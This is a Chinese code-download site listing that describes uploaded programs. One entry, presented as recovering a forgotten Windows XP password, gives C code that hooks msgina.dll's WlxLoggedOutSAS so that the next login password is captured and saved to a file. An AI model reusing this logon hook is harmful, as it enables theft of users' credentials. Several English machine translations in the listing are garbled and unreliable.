-
基于VC6.0的音频动态处理算法实现
音频非线性动态处理属于音频效果处理的一部分,在1983年左右就有相关的研究人员提出了动态处理的传统算法。经过这些年的发展,理论研究不断取得进展,同时MATLAB的运用与仿真为算法的准确性提供了参考。随着DSP芯片计算能力的不断提高,实时数字音频效果器的实现成为可能,运用领域不断扩大。本文在掌握传统动态处理算法的基础上,学习当前为减小非线性失真提出的不同算法,权衡各算法的优缺点,在此基础上设计一种算法,达到实时处理,失真小的目的。
- 2022-03-12 21:04:06下载
- 积分:1
-
解压后的文件夹,包含了常用的矩阵运算,C++语言…
解压后的文件夹中包含矩阵常见运算的c++语言实现算法,具体见减压文件夹中-After extracting the folder that contains common matrix operations c++ Language algorithms, see decompression specific folder
- 2023-02-17 02:05:03下载
- 积分:1
-
文件读写程序,很不错的!
文件读写程序,很不错的!-document literacy procedures, very good!
- 2022-02-05 22:32:59下载
- 积分:1
-
Himself wrote the first MFC procedures, performance management function is to ac...
自己写的第一个MFC程序,功能是成绩管理,
实现文件写入与存储,成绩的排序,学生的搜索。-Himself wrote the first MFC procedures, performance management function is to achieve a document written with the storage, sorting results, the students of english.
- 2022-10-30 23:50:02下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
图形处理界面,与windows的BMP兼容,耐用,实在!请大家使用!
图形处理界面,与windows的BMP兼容,耐用,实在!请大家使用!-Image processing interface . It s compatible to Windows Bitmap. It s very useful. Please enjoy it!
- 2022-04-24 20:08:35下载
- 积分:1
-
密码检索
这可以用于获取数据库连接的连接,也与 sql 的 batabase 连接。欢迎大家下载、试用。谢谢大家的支持!
- 2022-01-25 22:59:18下载
- 积分:1
-
这是一个小程序.为魔法语言,有兴趣的人可以下下来看看.也是一个挺好的算法....
这是一个小程序.为魔法语言,有兴趣的人可以下下来看看.也是一个挺好的算法.-This is a small program. For the magic language, interested persons can look down under. Also a very good algorithm.
- 2022-02-15 02:44:21下载
- 积分:1
-
desktop "The Wrecking worms", the insect A Montreal! !
桌面“捣蛋虫”,满地的虫子阿-desktop "The Wrecking worms", the insect A Montreal! !
- 2022-07-12 22:47:13下载
- 积分:1
-
multithreading examples procedures
多线程的例子程序-multithreading examples procedures
- 2023-01-21 15:35:04下载
- 积分:1